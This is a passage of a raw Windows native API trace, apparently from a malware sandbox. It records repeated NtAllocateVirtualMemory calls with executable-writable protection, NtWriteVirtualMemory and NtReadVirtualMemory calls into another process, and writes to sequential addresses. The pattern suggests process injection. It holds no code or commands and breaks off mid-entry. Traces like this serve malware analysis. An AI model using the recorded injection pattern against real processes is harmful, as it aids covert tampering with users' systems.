[0241.125] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.125] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.125] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.125] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.125] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.125] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.125] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.126] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.126] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.126] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.126] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a330, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.126] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.126] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c476*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c476*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.126] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.126] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.127] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.127] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.127] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.127] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.127] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.128] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.128] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.128] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.128] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.128] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.128] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a338, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.128] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.128] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c5a4*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c5a4*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.129] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.129] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.129] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.129] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.129] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.129] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.130] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.130] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.130] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.130] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.130] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.130] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.130] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a340, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.131] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x21, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.131] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c5b8*, NumberOfBytesToWrite=0x9, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c5b8*, NumberOfBytesWritten=0x28df88*=0x9) returned 0x0 [0241.131] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.131] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.131] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.131] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.132] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.132] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.132] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.132] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.132] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.132] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.132] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20019, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.132] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.133] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a348, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.133] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.133] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c5c4*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c5c4*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.133] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.133] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.134] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.134] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.134] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.134] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.134] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.134] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.134] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.134] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.135] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.135] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.135] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a350, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.135] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.135] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c5ce*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c5ce*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.135] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.135] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.136] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.136] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.136] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.136] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.136] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.136] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.137] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.137] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.137] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.137] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.137] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a358, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.137] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2a, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.137] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c5e0*, NumberOfBytesToWrite=0x12, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c5e0*, NumberOfBytesWritten=0x28df88*=0x12) returned 0x0 [0241.138] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.138] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.138] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.138] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.138] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.138] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.138] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.139] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.139] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.139] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.159] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20022, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.159] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.159] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a360, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.159] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.159] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca3a*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca3a*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0241.160] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.160] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.160] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.160] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.160] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.161] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.161] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.168] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.171] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.171] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.172] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.172] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.172] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a368, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.172] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.172] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca44*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca44*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.172] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.172] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: 